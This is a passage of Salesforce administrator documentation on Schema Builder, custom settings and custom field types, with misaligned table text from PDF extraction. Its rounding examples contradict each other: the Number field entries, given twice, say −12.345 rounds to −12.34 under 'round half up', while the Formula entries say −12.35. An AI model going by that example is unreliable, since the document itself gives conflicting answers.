• Hover over relationship lines to show relationship details such as lookup and master-detail relationships. Click the name
of the object to find it on the canvas. You may want to hide relationships if your schema is taking too long to load.

• To view the details of a field in a new window, click the element name or label and select View Field in New Window.

• To edit properties of a custom field, click the element name or label and select Edit Field Properties....
• To manage permissions of a custom field, click the element name or label and select Manage Field Permissions. Use the

dialog box that appears to manage the field’s visibility and writability for all standard and custom profiles. By default, the
field level security for custom fields is set to visible and editable for internal profiles—those not cloned from Partner User
or Customer Portal Manager. Fields that are not normally editable, such as formulas and roll-up summary fields, are visible
and read-only.

• Click  to:

◊ Hide Object on Canvas
◊ View Object detail in a new window

◊ View Page Layouts detail in a new window

• Click Show More Fields to display all the fields of an object.

•
To zoom in, click . To zoom out, click .

Note:  You can't save the level of zoom when closing Schema Builder.

•
To collapse the sidebar, click . To expand it, click .

• The map in the lower right corner shows the overall layout of your objects on the canvas. Click on the map to navigate the
layout of your objects. To pan across the schema layout while zoomed in, click and hold the canvas while moving the
mouse.

• To close the Schema Builder and save the layout of your objects, click Close.

Important:  If your schema contains many objects and fields, it may cause long loading times. Click Hide Relationships
to improve Schema Builder performance.

See Also:
Creating Objects with Schema Builder
Deleting Custom Objects with Schema Builder
Creating Fields with Schema Builder
Deleting Custom Fields with Schema Builder
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Creating Objects with Schema Builder

Available in: All Editions

User Permissions Needed

"Customize Application"To create new custom objects in Schema Builder:

To create a new custom object with Schema Builder:

1. Click the Elements tab.
2. Click Object and drag it onto the canvas.
3. Enter information to define your object. See Schema Builder Custom Object Definition on page 2905 for a list of object

definitions.
4. Click Save.

See Also:
Schema Builder Custom Object Definition

Creating Fields with Schema Builder

Available in: All Editions

User Permissions Needed

"Customize Application"To create new fields in Schema Builder:

To create a new custom field with Schema Builder:

1. Click the Elements tab.
2. Click a field and drag it onto an object on the canvas.
3. Enter a Field Label.

Salesforce populates Field Name using the field label. This name can contain only underscores and alphanumeric
characters, and must be unique in your organization. It must begin with a letter, not include spaces, not end with an
underscore, and not contain two consecutive underscores.

Ensure that the custom field name and label are unique for that object.

• If a standard and custom field have identical names or labels, the merge field displays the custom field value.
• If two custom fields have identical names or labels, the merge field may display an unexpected value.
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If you create a field label called Email and a standard field labeled Email already exists, the merge field may be unable
to distinguish between the fields. Adding a character to the custom field name makes it unique. For example, Email2.

4. Enter a Description of the custom field.
5. Enter Help Text to detail the purpose and function of a custom field.
6. Enter a Default Value to automatically insert a value of a custom field when a new record is created.
7. Depending on the custom field type you choose, enter any remaining field attributes.
8. Click Save.

See Also:
Schema Builder Custom Field Definition

Deleting Custom Objects with Schema Builder
You can delete custom objects using Schema Builder.

Available in: All Editions

User Permissions Needed

"Customize Application"To delete custom objects in Schema Builder:

Schema Builder displays list of side effects when you try to delete a custom object. Be sure you’re ready to accept these side
effects before finalizing the deletion. See Deleting Custom Objects on page 2882 and Managing Deleted Custom Objects on
page 2883.

1. Click  on the custom object’s icon.
2. Select Delete Object.... A dialog box displays that explains the side effects of deleting an object. Read this information

carefully.
3. If you accept the conditions, check Yes, I want to delete the custom object.
4. Click Delete.

Deleting Custom Fields with Schema Builder
You can delete custom fields using Schema Builder.

Available in: All Editions

User Permissions Needed

"Customize Application"To delete custom fields in Schema Builder:
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Schema Builder displays a list of side effects when you try to delete a custom field. Be sure you’re ready to accept these side
effects before finalizing the deletion.

1. Right click on the custom field.
2. Select Delete Field.... A dialog box displays that explains the side effects of deleting a custom field. Read this information

carefully.
3. If you accept the conditions, check Yes, I want to delete the custom field.
4. Click Delete.

Schema Builder Custom Object Definition
Available in: All Editions

DescriptionField

A name used to refer to the object in any user interface pages.Label

The plural name of the object. If you create a tab for this
object, this name is used for the tab.

Plural Label

If it’s appropriate for your organization’s default language,
check if your label should be preceded by "an" instead of "a".

Starts with a vowel sound

A unique name used to refer to the object when using the
API. In managed packages, this unique name prevents naming

Object Name

conflicts on package installations. The Object Name field can
contain only underscores and alphanumeric characters. It must
be unique, begin with a letter, not include spaces, not end with
an underscore, and not contain two consecutive underscores.

An optional description of the object. A meaningful
description helps you remember the differences between your
custom objects when you’re viewing them in a list.

Description

The name used in page layouts, list views, related lists, and
search results.

Record Name

The type of field (text or auto-number) for the record name.
Records that have unique IDs instead of names use

Data Type

auto-numbers. An auto-number is a unique number assigned
automatically. It is always a read-only field.

Makes the data in the custom object records available for
reporting purposes.

To create reports on custom objects, choose the Other Reports
report type category unless the custom object has a relationship

Allow Reports

with a standard object. When the custom object has a
master-detail relationship with a standard object, or is a lookup
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DescriptionField

object on a standard object, select the standard object for the
report type category instead.

Allows users to associate tasks and scheduled calendar events
related to the custom object records.

Allow Activities

Enables your organization to track changes to fields on the
custom object records, such as who changed the value of a

Track Field History

field, when it was changed, and what the value of the field
was before and after the edit. History data is available for
reporting, so users can easily create audit trail reports when
this feature is enabled.

If your organization has divisions enabled, select this option
to enable the custom object for divisions. Divisions group

Enable Divisions

records for simplified search results, list views, reports, and
other areas within Salesforce. Salesforce adds a Division
field to the custom object, and if the custom object is the
master in a master-detail relationship, any custom objects on
the detail side also get the Division field and inherit their
division from the master record.

This option makes the custom object available through the
Salesforce Customer Portal.

Available for Customer Portal

In a packaging context, a namespace prefix is a one to
15-character alphanumeric identifier that distinguishes your

Namespace Prefix

package and its contents from packages of other developers
on AppExchange. Namespace prefixes are case-insensitive.
For example, ABC and abc are not recognized as unique. Your
namespace prefix must be globally unique across all Salesforce
organizations. It keeps your managed package under your
control exclusively.

Indicates whether the custom object is visible to other users.Deployment Status

Allows users to attach notes and attachments to custom object
records. This allows you to attach external documents to any

Add Notes & Attachments...

object record, in much the same way that you can add a PDF
or photo as an attachment to an email.

This option is only available when you are creating a new
object.
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Schema Builder Custom Field Definition
Available in: All Editions

DescriptionType

Automatically assigns a unique number to each record. The
maximum length of any auto-number field is 30 characters,
20 of which are reserved for prefix or suffix text.

Auto Number

Allows users to automatically calculate values based on other
values or fields such as merge fields.

Formula

Note: Salesforce uses the round half up tie-breaking
rule for numbers in formula fields. For example,
12.345 becomes 12.35 and −12.345 becomes −12.35.

Automatically displays the record count of related records or
calculates the sum, minimum, or maximum value of related

Roll-Up Summary

records. The records must be directly related to the selected
record and on the detail side of a custom master-detail
relationship with the object that contains the roll-up summary
field. For example, a custom field called “Total Number of
Guests” displays the number of guest custom object records
in the Guests related list.

Creates a relationship between two records so you can associate
them with each other. For example, opportunities have a

Lookup Relationship

lookup relationship with cases that lets you associate a
particular case with an opportunity. A lookup relationship
creates a field that allows users to click a lookup icon and select
another record from a popup window. On the associated
record, you can then display a related list to show all of the
records that are linked to it. You can create lookup relationship
fields that link to users, standard objects, or custom objects.
If a lookup field references a record that has been deleted,
Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being
deleted if they’re in a lookup relationship.

Lookup relationship fields aren’t available in Personal Edition.

Lookup relationship fields to campaign members aren’t
available; however, lookup relationship fields from campaign
members to other objects are available.
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DescriptionType

Creates a relationship between records where the master record
controls certain behaviors of the detail record such as record
deletion and security.

Available for custom objects only, although you can create a
master-detail relationship field on a custom object that links
to a standard object.

Master-Detail Relationship

Master-detail relationships can’t be used with campaign
members.

Allows users to check a box, indicating a true or false attribute
of a record. When using a checkbox field for a report or list

Checkbox

view filter, use “True” for checked values and “False” for
unchecked values. The import wizards and the weekly export
tool use “1” for checked values and “0” for unchecked values.

Allows users to enter a currency amount. The system
automatically formats the field as a currency amount. This can
be useful if you export data to a spreadsheet.

Currency

Note: Salesforce uses the round half even
tie-breaking rule for currency fields. For example,
23.5 becomes 24, 22.5 becomes 22, −22.5 becomes
−22, and −23.5 becomes −24.

Values lose precision after 15 decimal places.

Allows users to enter a date or pick a date from a popup
calendar. In reports, you can limit the data by specific dates
using any custom date field.

Date

Allows users to enter a date or pick a date from a popup
calendar and enter a time of day. They can also add the current

Date/Time

date and time by clicking the date and time link next to the
field. The time of day includes AM or PM notation. In
reports, you can limit the data by specific dates and times using
any custom date field.

Allows users to enter an email address, which is validated to
ensure proper format. If this field is specified for contacts or

Email

leads, users can choose the address when clicking Send an
Email. Note that you can't use custom email addresses for
mass emails.

Allows users to enter any number. This is treated as a real
number and any leading zeros are removed.

Number

Note: Salesforce uses the round half up tie-breaking
rule for number fields. For example, 12.345 becomes
12.35 and −12.345 becomes −12.34. Salesforce rounds
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DescriptionType

numbers referenced in merge fields according to the
user’s locale, not the number of decimal spaces
specified in the number field configuration.

Allows users to enter a percentage number, for example, '10'.
The system automatically adds the percent sign to the number.

Percent

Note:  If the decimal value is greater than 15, and
you add a percent sign to the number, a runtime error
occurs.

Values lose precision after 15 decimal places.

Allows users to enter any phone number.

Salesforce automatically formats it as a phone number.

Phone

If you are using Salesforce CRM Call Center, custom phone
fields are displayed with the  button, allowing click-to-dial
functionality. Consequently, salesforce.com recommends that
you don’t use a custom phone field for fax numbers.

Allows users to select a value from a list you define.Picklist

Allows users to select more than one picklist value from a list
you define. These fields display each value separated by a
semicolon.

Picklist (Multi-Select)

Allows users to enter any combination of letters, numbers, or
symbols. You can set a maximum length, up to 255 characters.

Text

Allows users to enter any combination of letters, numbers, or
symbols that are stored in encrypted form. You can set a

Text (Encrypted)

maximum length of up to 175 characters. Encrypted fields are
encrypted with 128-bit master keys and use the AES
(Advanced Encryption Standard) algorithm. You can archive,
delete, and import your master encryption key. To enable
master encryption key management, contact salesforce.com.

Allows users to enter up to 255 characters that display on
separate lines similar to a Description field.

Text Area

Allows users to enter up to 32,768 characters that display on
separate lines similar to a Description field. You can set

Text Area (Long)

the length of this field type to a lower limit, if desired. Any
length from 256 to 32,768 characters is allowed. Every time
you press Enter within a long text area field, a linebreak and
a return character are added to the text. These two characters
count toward the 32,768 character limit. This data type is not
available for activities or products on opportunities.
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DescriptionType

With the use of a toolbar, users can format the field content
and add images and hyperlinks. The toolbar allows the user

Text Area (Rich)

to undo, redo, bold, italicize, underline, strike-out, add a
hyperlink, upload or link to an image, modify alignment, add
a numbered or non-numbered list, indent, and outdent. The
maximum field size is 32,768 characters, inclusive of all the
formatting and HTML tags. Only the first 254 characters in
a rich text area or a long text area are displayed in a report.
The maximum size for uploaded images is 1MB. Only gif,
jpeg and png file types are supported.

Allows users to enter up to 255 characters of any valid website
address. When users click on the field, the URL opens in a

URL

separate browser window. Only the first 50 characters are
displayed on the record detail pages.

CREATING UNIQUE SETS OF DATA

Custom Settings Overview
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

Custom settings are similar to custom objects and enable application developers to create custom sets of data, as well as create
and associate custom data for an organization, profile, or specific user. All custom settings data is exposed in the application
cache, which enables efficient access without the cost of repeated queries to the database. This data can then be used by formula
fields, validation rules, Apex, and the SOAP API.

There are two types of custom settings:

List Custom Settings

A type of custom setting that provides a reusable set of static data that can be accessed across your organization. If you
use a particular set of data frequently within your application, putting that data in a list custom setting streamlines access
to it. Data in list settings does not vary with profile or user, but is available organization-wide. Examples of list data
include two-letter state abbreviations, international dialing prefixes, and catalog numbers for products. Because the data
is cached, access is low-cost and efficient: you don't have to use SOQL queries that count against your governor limits.
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Hierarchy Custom Settings

A type of custom setting that uses a built-in hierarchical logic that lets you “personalize” settings for specific profiles or
users. The hierarchy logic checks the organization, profile, and user settings for the current user and returns the most
specific, or “lowest,” value. In the hierarchy, settings for an organization are overridden by profile settings, which, in
turn, are overridden by user settings.

The following examples illustrate how you can use custom settings:

• A shipping application requires users to fill in the country codes for international deliveries. By creating a list setting of all
country codes, users have quick access to this data without needing to query the database.

• An application calculates and tracks compensation for its sales reps, but commission percentages are based on seniority.
By creating a hierarchy setting, the administrator can associate a different commission percentage for each profile in the
sales organization. Within the application, one formula field can then be used to correctly calculate compensation for all
users; the personalized settings at the profile level inserts the correct commission percentage.

• An application displays a map of account locations, the best route to take, and traffic conditions. This information is useful
for sales reps, but account executives only want to see account locations. By creating a hierarchy setting with custom
checkbox fields for route and traffic, you can enable this data for just the “Sales Rep” profile.

Follow these steps to create and use custom settings:

1. Create the custom setting.
2. Add fields to the custom setting.
3. Add data and set the access level for the custom setting data.
4. Reference the custom setting data in your application, using formula fields, validation rules, Apex, or the SOAP API.

You can also include a custom setting in a package. The visibility of the custom setting in the package depends on the
Visibility setting.

Note:  Only custom settings definitions are included in packages, not data. If you need to include data, you must
populate the custom settings using a standard Apex or API script run by the subscribing organization after they have
installed the package.

Managing Custom Settings

Click New to create a new custom setting. After you create a custom setting, you must add fields to it.

After you create a custom setting, you can do any of the following:

• Click Edit next to the name of a custom setting to change the name, label, or description of a custom setting.
• Click Del to delete a custom setting.

Note:  A  icon indicates that the custom setting is in an installed managed package. You can’t edit or delete a
custom setting installed from a managed package.

• Click Manage to add data to a custom setting. You should add fields before you add data.

See Also:
Viewing Custom Settings
Custom Settings Limits
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Accessing Custom Settings
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

You can access custom settings from formula fields, validation rules, Apex, and the SOAP API. Some sample code segments
are provided below.

Formula Fields

Formula fields only work for hierarchy custom settings; they can’t be used for list custom settings.

{!$Setup.CustomSettingName__c.CustomFieldName__c}

Apex

Apex can access both custom setting types.

Note:  If Privacy for a custom setting is Protected and the custom setting is contained in a managed package,
the subscribing organization cannot edit the values or access them using Apex.

Samples for List Custom Settings

When you add data to a custom setting, you must name each set of data. Then you can distinguish between the
sets of data by the data set name. The following returns a map of custom settings data. The getAll method returns
values for all custom fields associated with the list setting.

Map<String_dataset_name, CustomSettingName__c> mcs = CustomSettingName__c.getAll();

The following example uses the getValues method to return all the field values associated with the specified
data set. This method can be used with both list and hierarchy custom settings, using different parameters.

CustomSettingName__c mc = CustomSettingName__c.getValues(data_set_name);

Samples for Hierarchy Custom Settings

The following example uses the getOrgDefaults method to return the data set values for the organization level:

CustomSettingName__c mc = CustomSettingName__c.getOrgDefaults();

2912

Accessing Custom SettingsCreating Unique Sets of Data



The following example uses the getInstance method to return the data set values for the specified profile. The
getInstance method can also be used with a user ID.

CustomSettingName__c mc = CustomSettingName__c.getInstance(Profile_ID);

SOAP API

Custom settings that have Privacy defined as Public are exposed to the API in the same way custom objects are exposed.

Note:  If Privacy is defined as Protected, and the custom setting is contained in a managed package, the
custom setting is not accessible using the API in either the developer organization or a subscribing organization.

Use any tool with API access to perform query or profile-permission-setting operations.

Note:  You can also access custom settings data through a Standard Object Query Language (SOQL) query, but this
method doesn't make use of the application cache. It’s similar to querying a custom object.

See Also:
Custom Settings Overview

Defining Custom Settings
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

To create or edit a custom setting:

1. From Setup, click Develop > Custom Settings.
2. Click New to create a new custom setting, click Edit next to the name of a custom setting, or click Edit while viewing the

details of a custom setting.

Note:  A  icon indicates that the custom setting is in an installed managed package. You can’t edit or delete a
custom setting installed from a managed package.

3. Define the following:

• Label—Enter the label displayed in the application.
• Object Name—Enter the name to be used when the custom setting is referenced by formula fields, validation rules,

Apex, or the SOAP API.
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Note: Salesforce.com recommends using ASCII for the Object Name. The name can't exceed 38 ASCII
characters. If you use double byte, there are additional limits on the number of characters allowed.

• Setting Type—Select a type of List or Hierarchy. The List type defines application-level data, such as country codes
or state abbreviations. The Hierarchy type defines personalization settings, such as default field values, that can be
overridden at lower levels in the hierarchy.

Important:  After you save a custom setting, you cannot change this value.

• Visibility—Select a visibility of Protected or Public.

◊ Protected—If the custom setting is contained in a managed package, subscribing organizations can't see the custom
setting: it doesn't display as part of the package list. In addition, subscribing organizations can't access the custom
setting using either Apex or the API, however, developer organizations can. If the custom setting is contained in
an unmanaged package, the custom setting is available through the Enterprise WSDL like any custom object (as
if the Visibility was Public.)

◊ Public—The custom setting is available through the Enterprise WSDL like any custom object. You can package
custom settings defined as public. The subscribing organizations can edit the values, as well as access them using
Apex and the API, regardless of the type of package (either managed or unmanaged).

Important:  After you save a custom setting, you cannot change this value.

4. Enter an optional description of the custom setting. A meaningful description will help you remember the differences
between your custom settings when you’re viewing them in a list.

5. Click Save.

Note:  Only custom settings definitions are included in packages, not data. If you need to include data, you must
populate the custom settings using a standard Apex or API script run by the subscribing organization after they
have installed the package.

After you create a custom setting, you must also add fields to the custom setting.

See Also:
Adding Custom Settings Fields
Adding Custom Settings Data
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Viewing Custom Settings
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

After you create a custom setting, you can view the details of the custom setting, manage the custom setting, and add fields.

From Setup, click Develop > Custom Settings, then click the name of the custom setting you'd like to view. While viewing
a custom setting, you can:

• Click Edit to make changes to a custom setting.

• Click Delete to delete a custom setting.

Note:  A  icon indicates that the custom setting is in an installed managed package. You can’t edit or delete a
custom setting installed from a managed package.

• Click Manage to add data to a custom setting.

In addition, click New to add fields to the custom setting.

See Also:
Defining Custom Settings

Adding Custom Settings Fields
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

Packages are not available in Database.com.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

After you define custom settings, you need to add custom fields to them. The custom fields contain the data used by the
custom setting.

To add custom fields to a custom setting:

1. From Setup, click Develop > Custom Settings.
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2. Click the name of the custom setting that you want to add fields to. (If you just created a custom setting, you are taken
directly to the Custom Setting Detail page.)

3. Click New.
4. Select a field type and click Next.
5. Enter the details for your custom field.
6. Once you confirm the information, click Save or Save & New.

After you add the required fields, you need to add data, and for hierarchy custom settings, specify the access level.

See Also:
Adding Custom Settings Data

Managing Custom Settings Data
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

After defining custom settings and adding fields, populate the fields:

1. From Setup, click Develop > Custom Settings.
2. Click Manage next to a custom setting, or from the detail page for a custom setting.
3. Provide or change values for the custom setting.

• If you are managing a list setting:

◊ Click New to add data to the fields.
◊ Click Edit next to the name of an existing set of data to change the name of the data set or to change the data.
◊ Click Del next to the name of an existing set of data to delete the data set.

• If you are managing a hierarchy setting, decide where in the permission hierarchy you want to add default data
(organization, profile, or user).

To add default data at the organization level, click New in the Default Organization Level Value section. If data has
already been defined for the organization, you can only edit or delete it.

To add default data at the profile or user level, click New in the lower section of the page, near the Setup Owner.

After you have defined data, you can:

• Click Edit in the Default Organization Level Value section to change the default data set at the organization level, or
Delete to delete it (this is only for hierarchical custom settings.)

• Click View next to the name of an existing set of data to view the data (this is only for hierarchical custom settings.)
• Click Edit next to the name of an existing set of data to change the name of the data set or to change the data.
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• Click Del next to the name of an existing set of data to delete the data set.

See Also:
Custom Settings Limits
Adding Custom Settings Data

Adding Custom Settings Data

Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

After you define your custom settings and add fields, you need to populate the fields with data.

You can define one or more data sets. For list custom settings, each data set is named and can be accessed by that name using
Apex, formula fields, and so on.

For custom settings that are hierarchies, the data is accessed based on the access level (user, profile, or organization). The
lowest level is used first, which means if you defined a data set at the user level, unless otherwise specified in your application,
that data is used. For example, you might want to specify different contact numbers for your application: one for the general
user, and one that is only displayed for system administrators.

To add data to custom setting fields:

1. From Setup, click Develop > Custom Settings, then click Manage next to a custom setting. Or from the detail page for
a custom setting, click Manage.

2. Click New or Edit next to an existing data set.
3. Add or change data.

For custom settings that are lists:

a. Specify or change the name for the data set. This name is used by Apex, formula fields, and so on.
b. Enter or change data for all fields.
c. Click Save.

For custom settings that are hierarchies:

a. For the default organization level values, enter or change the data for the fields. The default organization location is
automatically populated.

b. For profile or user level values, select either Profile or User from the Location picklist. Enter the name of the
profile or user, or use the lookup dialog search. Then enter or change the data for the fields.
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c. Click Save.

See Also:
Managing Custom Settings Data
Adding Custom Settings Fields

Viewing Custom Settings Data

Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

After you add fields and add data to those fields, you can view the data.

1. From Setup, click Develop > Custom Settings, then click Manage next to a custom setting that has already been defined.
Or from the detail page for a custom setting, click Manage.

2. Click View next to the data set you want to view (this is only for hierarchical custom settings).

See Also:
Adding Custom Settings Fields
Adding Custom Settings Data

Custom Settings Limits
Available in: Group, Professional, Developer, Enterprise, Unlimited, and Database.com Editions.

User Permissions Needed

“Customize Application”To manage, create, edit, and delete custom settings:

Salesforce imposes these limits on the amount of cached data and on custom settings:

• The total amount of cached data allowed for your organization is the lesser of these two values:

◊ 10 MB

◊ 1 MB multiplied by the number of full-featured user licenses in your organization
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For example, if your organization has three full licenses, you have 3 MB of custom setting storage. If your organization
has 20 full licenses, you have 10 MB of storage.

Each Certified managed package gets its own separate limit in addition to your organization limit. For example, if your
organization has two certified managed packages installed and your organization has three full licenses, each certified
managed package can have 3 MB of custom setting storage, in addition to your organization’s 3 MB custom setting storage
limit.

• 300 fields per custom setting.

• You can’t share a custom setting object or record.

• No owner is assigned when a custom setting is created, so the owner can’t be changed.

• Custom settings are a type of custom object. Each custom setting counts against the total number of custom objects available
for your organization.

To see how much custom settings data your organization is using, from Setup, click Develop > Custom Settings. This page
also details how much resource each custom setting uses, including the number of records and the size of the custom setting
definition.

See Also:
Custom Settings Overview

WORKING WITH CUSTOM FIELDS

Customizing Fields
Available in: All Editions

Standard Fields and Page Layouts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change custom fields:

Customize fields to tailor your organization’s unique requirements. You can:

• Modify some aspects of standard fields

• Change or add values to custom picklist fields

• Define dependency rules between fields

• Create custom fields to capture additional information

• Create formula fields that automatically calculate values based on the contents of other fields

• Define default values for custom fields

• Define validation rules for your fields
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• Make a field required

• Set fields to track changes, including the date, time, nature of the change, and who made the change

• Create page layouts to control the display of fields

• Set field-level security to control access to fields

• Create or modify field sets

Customizing Standard Fields

Available in: All Editions except for Database.com.

User Permissions Needed

“Customize Application”To change standard fields:

You can customize several aspects of standard fields, such as the values in picklists, the format for auto-number fields, tracking
field history, lookup filters on relationship fields, and field-level help.

In Enterprise, Unlimited, and Developer Editions, you can also view details about standard fields and set field-level security.

Modifying Standard Auto-Number Fields

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To modify standard auto-number fields:

The unique identifiers for solutions, cases, and contracts are standard auto-number fields. Each record is assigned a unique
number with a specified format upon creation. You can modify the format and numbering for these auto-number fields.

1. From Setup, click Customize, select the appropriate tab link, and then click the Fields link.
2. Click Edit next to the name of the field in the Standard Fields list.
3. Enter a Display Format to control such formatting details as the minimum number of leading zeros as well as any prefix

or suffix for the number. See Custom Field Attributes on page 2928.

Format changes do not affect existing records; they are applied only to new records.

4. Enter the number to be assigned to the next record that is created after you save your changes.
5. Click Save.
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Warning: Salesforce warns you if the next number you enter is not higher than existing numbers. However, it may
be possible to create duplicate numbers if you change the auto-number format multiple times using similar formats
each time.

See Also:
Custom Field Types

About Custom Fields
Available in: All Editions

Tabs are not available in Database.com

User Permissions Needed

“Customize Application”To create or change custom fields:

To tailor your organization, you can add custom fields for each of the tabs and objects that your organization uses.

For the total number of custom fields you can create, see Salesforce Limits.

See the following for more information:

• Creating Custom Fields

• Editing Fields

• Viewing Fields

• Deleting Fields

• Building Formulas

• Defining Dependent Picklists

• Defining Default Field Values

• Additional Custom Field Options

• Custom Field Attributes

• Changing Custom Field Type

2921

About Custom FieldsWorking with Custom Fields



CREATING AND ENHANCING CUSTOM FIELDS

Creating Custom Fields
Available in: Personal, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Relationship fields aren’t available in Personal Edition

Custom fields aren’t available on Activities in Group Edition

Custom settings aren’t available in Professional Edition

Layouts aren’t available in Database.com

User Permissions Needed

“Customize Application”To create or change custom fields:

Create custom fields to store important information. Before you begin, determine the type of field you want to create.

1. Navigate to the fields area of the appropriate object.

• For standard objects, from Setup, click Customize, select the appropriate object, and click Fields.
• For custom task and event fields, from Setup, click Customize > Activities > Activity Custom Fields.
• For custom objects, from Setup, click Create > Objects, and select one of the custom objects in the list.
• For custom settings, from Setup, click Develop > Custom Settings, and click the name of the custom setting.

2. In Custom Fields & Relationships, click New.

Tip:  You can also set field dependencies and field history tracking on custom objects in this section.

3. Choose the type of field and click Next. Consider the following.

• Some data types are available for certain configurations only. For example, the Master-Detail Relationship
option is available for custom objects only when the custom object doesn’t already have a master-detail relationship.

• Custom settings allow only a subset of the available data types.
• Relationship fields count towards custom field limits.
• Additional field types may appear if an AppExchange package using those field types is installed.
• The Roll-Up Summary option is available on certain objects only.
• Field types correspond to API data types.

4. For relationship fields, associate an object with the field and click Next.
5. Enter a field label.
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Salesforce populates Field Name using the field label. This name can contain only underscores and alphanumeric
characters, and must be unique in your organization. It must begin with a letter, not include spaces, not end with an
underscore, and not contain two consecutive underscores. Use the field name for merge fields in custom links, custom
s-controls, and when referencing the field from the API.

Tip:

Ensure that the custom field name and label are unique for that object.

• If a standard and custom field have identical names or labels, the merge field displays the custom field value.
• If two custom fields have identical names or labels, the merge field may display an unexpected value.

If you create a field label called Email and a standard field labeled Email already exists, the merge field may be
unable to distinguish between the fields. Adding a character to the custom field name makes it unique. For example,
Email2.

6. Enter field attributes and select the appropriate checkboxes to specify whether the field must be populated and what happens
if the record is deleted.

7. For master-detail relationships on custom objects, optionally select Allow reparenting to allow a child record in the
master-detail relationship to be reparented to a different parent record.

8. For relationship fields, optionally create a lookup filter to limit search results for the field.
9. Click Next.
10. In Enterprise, Unlimited, and Developer Editions, specify the field’s access settings for each profile, and click Next.

Enabled SettingsAccess Level

VisibleUsers can read and edit the field.

Visible and Read-OnlyUsers can read but not edit the field.

NoneUsers can’t read or edit the field.

Note:

• When you create a custom field, by default the field isn’t visible or editable for portal profiles, unless the field
is universally required.

• Profiles with “View Encrypted Data” permission are indicated with an asterisk.

11. Choose the page layouts that will display the editable field and click Next.

Location on Page LayoutField

Last field in the first two-column section.Normal

End of the first one-column section.Long text area

Bottom of the user detail page.User

Can’t remove it from page layouts or make read only.Universally required

12. For relationship fields, optionally create an associated records related list and add it to page layouts for that object.
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• To edit the related list name on page layouts, click Related List Label and enter the new name.
• To add the related list to customized page layouts, select Append related list to users’ existing personal

customizations.

13. Click Save to finish or Save & New to create more custom fields.

Note:  Creating fields may require changing a large number of records at once. To process these changes efficiently,
your request may be queued and you may receive an email notification when the process has completed.

Custom Field Types
The first step in creating a custom field is choosing the type of the field. Below is a description of each custom field type.
Additional field types may appear if an AppExchange package using those field types is installed.

DescriptionType

Automatically assigns a unique number to each record. The
maximum length of any auto-number field is 30 characters,
20 of which are reserved for prefix or suffix text.

Auto Number

Allows users to check a box, indicating a true or false attribute
of a record. When using a checkbox field for a report or list

Checkbox

view filter, use “True” for checked values and “False” for
unchecked values. The import wizards and the weekly export
tool use “1” for checked values and “0” for unchecked values.

Allows users to enter a currency amount. The system
automatically formats the field as a currency amount. This can
be useful if you export data to Excel or another spreadsheet.

Currency

Note: Salesforce uses the round half even
tie-breaking rule for currency fields. For example,
23.5 becomes 24, 22.5 becomes 22, −22.5 becomes
−22, and −23.5 becomes −24.

Values lose precision after 15 decimal places.

Allows users to enter a date or pick a date from a popup
calendar. In reports, you can limit the data by specific dates
using any custom date field.

Date

Allows users to enter a date or pick a date from a popup
calendar and enter a time of day. They can also add the current

Date/Time

date and time by clicking the date and time link next to the
field. The time of day includes AM or PM notation. In
reports, you can limit the data by specific dates and times using
any custom date field.

Allows users to enter an email address, which is validated to
ensure proper format. If this field is specified for contacts or

Email
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DescriptionType

leads, users can choose the address when clicking Send an
Email. Note that you can't use custom email addresses for
mass emails.

Allows users to automatically calculate values based on other
values or fields such as merge fields.

Formula

Note: Salesforce uses the round half up tie-breaking
rule for numbers in formula fields. For example,
12.345 becomes 12.35 and −12.345 becomes −12.35.

In Database.com, the Formula editor does not
provide a Check Syntax button. Syntax checking
occurs when the user attempts to save the formula.

Allows users to specify a location by its latitude and longitude.
Geolocation is a compound field that counts toward your

Geolocation

organization’s limits as three custom fields: one for latitude,
one for longitude, and one for internal use.

Note: The geolocation field is in beta release and
has known limitations. See Geolocation Custom Field
Overview—Beta on page 2932 for more information.

Creates a hierarchical lookup relationship between users.
Allows users to use a lookup field to associate one user with

Hierarchical Relationship

another that does not directly or indirectly refer to itself. For
example, you can create a custom hierarchical relationship
field to store each user's direct manager.

Creates a relationship between two records so you can associate
them with each other. For example, opportunities have a

Lookup Relationship

lookup relationship with cases that lets you associate a
particular case with an opportunity. A lookup relationship
creates a field that allows users to click a lookup icon and select
another record from a popup window. On the associated
record, you can then display a related list to show all of the
records that are linked to it. You can create lookup relationship
fields that link to users, standard objects, or custom objects.
If a lookup field references a record that has been deleted,
Salesforce clears the value of the lookup field by default.
Alternatively, you can choose to prevent records from being
deleted if they’re in a lookup relationship.

Lookup relationship fields are not available in Personal
Edition.
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DescriptionType

Lookup relationship fields to campaign members are not
available; however, lookup relationship fields from campaign
members to other objects are available.

Creates a relationship between records where the master record
controls certain behaviors of the detail record such as record
deletion and security.

Available for custom objects only, although you can create a
master-detail relationship field on a custom object that links
to a standard object.

Master-Detail Relationship

Master-detail relationships cannot be used with campaign
members.

Allows users to enter any number. This is treated as a real
number and any leading zeros are removed.

Number

Note: Salesforce uses the round half up tie-breaking
rule for number fields. For example, 12.345 becomes
12.35 and −12.345 becomes −12.34. Salesforce rounds
numbers referenced in merge fields according to the
user’s locale, not the number of decimal spaces
specified in the number field configuration.

Allows users to enter a percentage number, for example, '10'.
The system automatically adds the percent sign to the number.

Percent

